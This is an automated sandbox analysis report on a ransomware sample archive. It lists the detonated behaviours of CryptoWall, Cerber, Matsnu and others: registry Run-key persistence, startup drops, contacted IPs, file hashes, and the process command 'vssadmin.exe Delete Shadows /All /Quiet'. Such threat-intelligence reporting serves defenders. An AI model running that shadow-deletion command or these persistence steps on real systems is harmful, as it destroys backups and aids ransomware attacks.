Analysis Overview
SHA256
5fa4cbe0983a59dddd8a58c33a5cebcc0742c24f59c08f1cf78deebca0672697
Threat Level: Known bad
The file Ransomware-Samples-main.zip was found to be: Known bad.
Malicious Activity Summary
Jigsaw family
Locky family
Jigsaw Ransomware
Locky
Mimikatz
Cerber family
Mimikatz family
Cerber
Deletes shadow copies
Renames multiple (594) files with added filename extension
Renames multiple (3763) files with added filename extension
mimikatz is an open source tool to dump credentials on Windows
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Modifies Windows Firewall
Contacts a large (1098) amount of remote hosts
Contacts a large (1101) amount of remote hosts
Reads user/profile data of web browsers
Drops startup file
Checks computer location settings
Loads dropped DLL
Deletes itself
Executes dropped EXE
Writes to the Master Boot Record (MBR)
Drops desktop.ini file(s)
Looks up external IP address via web service
Adds Run key to start application
UPX packed file
Drops file in System32 directory
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Opens file in notepad (likely ransom note)
Suspicious use of UnmapMainImage
Interacts with shadow copies
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Uses Volume Shadow Copy service COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-26 15:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240903-en
Max time kernel
132s
Max time network
141s
Command Line
Signatures
Deletes shadow copies
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2fddd325.exe | C:\Windows\syswow64\explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*fddd325 = "C:\\Users\\Admin\\AppData\\Roaming\\2fddd325.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2fddd32 = "C:\\2fddd325\\2fddd325.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*fddd32 = "C:\\2fddd325\\2fddd325.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2fddd325 = "C:\\Users\\Admin\\AppData\\Roaming\\2fddd325.exe" | C:\Windows\syswow64\explorer.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-addr.es | N/A | N/A |
| N/A | myexternalip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2236 set thread context of 2568 | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\vssadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\explorer.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"
C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"
C:\Windows\syswow64\explorer.exe
"C:\Windows\syswow64\explorer.exe"
C:\Windows\syswow64\svchost.exe
-k netsvcs
C:\Windows\syswow64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-addr.es | udp |
| FR | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 8.8.8.8:53 | myexternalip.com | udp |
| US | 34.160.111.145:80 | myexternalip.com | tcp |
| FR | 91.121.12.127:4141 | tcp | |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.160.111.145:80 | myexternalip.com | tcp |
| FR | 91.121.12.127:4141 | tcp | |
| FR | 94.247.28.156:8081 | tcp |
Files
memory/2568-0-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2568-13-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2568-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2568-14-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2236-10-0x00000000003C0000-0x00000000003D6000-memory.dmp
memory/2568-8-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2568-6-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2568-4-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2568-2-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2568-16-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2976-15-0x0000000000080000-0x00000000000A5000-memory.dmp
memory/2972-21-0x0000000000080000-0x00000000000A5000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 484
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240708-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\vnycyvzj = "C:\\Users\\Admin\\AppData\\Roaming\\Nmlpryvbk\\dyuqmpyvzj.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2860 set thread context of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe |
| PID 2732 set thread context of 2832 | N/A | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
C:\Windows\SysWOW64\svchost.exe
svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nvufvwieg.com | udp |
Files
memory/2216-0-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-8-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-12-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-11-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-10-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-4-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-2-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-13-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2216-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2772-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2772-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2772-18-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
| MD5 | 1b2d2a4b97c7c2727d571bbf9376f54f |
| SHA1 | 1fc29938ec5c209ba900247d2919069b320d33b0 |
| SHA256 | 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e |
| SHA512 | 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0 |
memory/2772-28-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2832-45-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1196-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/1196-50-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/1196-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/1196-57-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.99.8.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 166.120.202.116.in-addr.arpa | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
Files
memory/392-0-0x00007FFEB40A5000-0x00007FFEB40A6000-memory.dmp
memory/392-1-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp
memory/392-2-0x000000001D4D0000-0x000000001D99E000-memory.dmp
memory/392-3-0x000000001BC60000-0x000000001BCFC000-memory.dmp
memory/392-4-0x000000001BD80000-0x000000001BDE2000-memory.dmp
memory/392-5-0x000000001BB70000-0x000000001BB78000-memory.dmp
memory/392-6-0x000000001DBA0000-0x000000001DBF2000-memory.dmp
memory/392-14-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp
memory/392-15-0x00007FFEB40A5000-0x00007FFEB40A6000-memory.dmp
memory/392-16-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp
memory/392-17-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Cerber
Cerber family
Contacts a large (1101) amount of remote hosts
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpE772.bmp" | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
